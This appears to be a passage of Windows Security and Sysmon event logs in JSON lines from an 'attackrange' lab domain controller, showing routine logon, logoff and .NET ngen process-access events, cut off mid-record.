{"EventTime":"2020-08-01 08:05:36","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4624,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":2,"Task":12544,"OpcodeValue":0,"RecordNumber":220714,"ProcessID":864,"ThreadID":3168,"Channel":"Security","Message":"An account was successfully logged on.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-0-0\r\n\tAccount Name:\t\t-\r\n\tAccount Domain:\t\t-\r\n\tLogon ID:\t\t0x0\r\n\r\nLogon Information:\r\n\tLogon Type:\t\t3\r\n\tRestricted Admin Mode:\t-\r\n\tVirtual Account:\t\tNo\r\n\tElevated Token:\t\tYes\r\n\r\nImpersonation Level:\t\tImpersonation\r\n\r\nNew Logon:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-6178966$\r\n\tAccount Domain:\t\tATTACKRANGE.LOCAL\r\n\tLogon ID:\t\t0xD3D23\r\n\tLinked Logon ID:\t\t0x0\r\n\tNetwork Account Name:\t-\r\n\tNetwork Account Domain:\t-\r\n\tLogon GUID:\t\t{77AE7113-A264-8FEA-3CEA-ABED442060A2}\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x0\r\n\tProcess Name:\t\t-\r\n\r\nNetwork Information:\r\n\tWorkstation Name:\t-\r\n\tSource Network Address:\t::1\r\n\tSource Port:\t\t50259\r\n\r\nDetailed Authentication Information:\r\n\tLogon Process:\t\tKerberos\r\n\tAuthentication Package:\tKerberos\r\n\tTransited Services:\t-\r\n\tPackage Name (NTLM only):\t-\r\n\tKey Length:\t\t0\r\n\r\nThis event is generated when a logon session is created. It is generated on the computer that was accessed.\r\n\r\nThe subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\r\n\r\nThe logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).\r\n\r\nThe New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.\r\n\r\nThe network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\r\n\r\nThe impersonation level field indicates the extent to which a process in the logon session can impersonate.\r\n\r\nThe authentication information fields provide detailed information about this specific logon request.\r\n\t- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.\r\n\t- Transited services indicate which intermediate services have participated in this logon request.\r\n\t- Package name indicates which sub-protocol was used among the NTLM protocols.\r\n\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-0-0","SubjectUserName":"-","SubjectDomainName":"-","SubjectLogonId":"0x0","TargetUserSid":"S-1-5-18","TargetUserName":"WIN-DC-6178966$","TargetDomainName":"ATTACKRANGE.LOCAL","TargetLogonId":"0xd3d23","LogonType":"3","LogonProcessName":"Kerberos","AuthenticationPackageName":"Kerberos","WorkstationName":"-","LogonGuid":"{77AE7113-A264-8FEA-3CEA-ABED442060A2}","TransmittedServices":"-","LmPackageName":"-","KeyLength":"0","ProcessName":"-","IpAddress":"::1","IpPort":"50259","ImpersonationLevel":"%%1833","RestrictedAdminMode":"-","TargetOutboundUserName":"-","TargetOutboundDomainName":"-","VirtualAccount":"%%1843","TargetLinkedLogonId":"0x0","ElevatedToken":"%%1842","EventReceivedTime":"2020-08-01 08:05:38","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:36","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4634,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12545,"OpcodeValue":0,"RecordNumber":220715,"ProcessID":864,"ThreadID":104,"Channel":"Security","Message":"An account was logged off.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-6178966$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0xD3D23\r\n\r\nLogon Type:\t\t\t3\r\n\r\nThis event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.","Category":"Logoff","Opcode":"Info","TargetUserSid":"S-1-5-18","TargetUserName":"WIN-DC-6178966$","TargetDomainName":"ATTACKRANGE","TargetLogonId":"0xd3d23","LogonType":"3","EventReceivedTime":"2020-08-01 08:05:38","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:38","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7359,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:38.241\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 3780\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-2252-5F25-0000-0010DC3E0D00}\r\nTargetProcessId: 2860\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:38.241","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"3780","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-2252-5F25-0000-0010DC3E0D00}","TargetProcessId":"2860","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:40","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:38","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7360,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:38.241\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 1148\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-2252-5F25-0000-0010DC3E0D00}\r\nTargetProcessId: 2860\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:38.241","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"1148","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-2252-5F25-0000-0010DC3E0D00}","TargetProcessId":"2860","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:05:40","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:38","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7361,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:38.257\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-2252-5F25-0000-0010DC3E0D00}\r\nTargetProcessId: 2860\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:38.257","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-2252-5F25-0000-0010DC3E0D00}","TargetProcessId":"2860","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:40","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:38","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7362,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:38.320\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 3780\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-2252-5F25-0000-0010B8420D00}\r\nTargetProcessId: 4068\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:38.320","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"3780","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-2252-5F25-0000-0010B8420D00}","TargetProcessId":"4068","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:40","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:38","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7363,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:38.320\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 664\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-2252-5F25-0000-0010B8420D00}\r\nTargetProcessId: 4068\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:38.320","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"664","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-2252-5F25-0000-0010B8420D00}","TargetProcessId":"4068","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:05:40","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:38","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7364,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:38.320\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-2252-5F25-0000-0010B8420D00}\r\nTargetProcessId: 4068\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:38.320","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-2252-5F25-0000-0010B8420D00}","TargetProcessId":"4068","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:40","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:38","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7365,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:38.366\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 3780\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-2252-5F25-0000-0010B2460D00}\r\nTargetProcessId: 3796\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: 